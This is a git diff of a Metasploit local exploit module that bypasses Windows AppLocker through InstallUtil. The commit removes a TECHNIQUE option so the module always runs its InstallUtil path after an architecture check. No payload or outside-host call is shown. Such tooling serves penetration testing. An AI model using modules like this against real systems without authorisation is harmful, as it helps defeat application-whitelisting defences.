parent
196b302897
commit
d78f2e7bbd
|
@ -37,26 +37,19 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
]
|
]
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options([
|
|
||||||
OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker',
|
|
||||||
'INSTALLUTIL', %w(INSTALLUTIL)])])
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# Run Method for when run command is issued
|
# Run Method for when run command is issued
|
||||||
def exploit
|
def exploit
|
||||||
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
|
|
||||||
if payload.arch.first == ARCH_X64 && sysinfo['Architecture'] !~ /64/
|
if payload.arch.first == ARCH_X64 && sysinfo['Architecture'] !~ /64/
|
||||||
fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
|
fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
# sysinfo is only on meterpreter sessions
|
# sysinfo is only on meterpreter sessions
|
||||||
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
|
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
|
||||||
|
|
||||||
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
|
|
||||||
execute_installutil
|
execute_installutil
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
def execute_installutil
|
def execute_installutil
|
||||||
envs = get_envs('TEMP', 'windir')
|
envs = get_envs('TEMP', 'windir')
|
||||||
|
|
Loading…
Reference in New Issue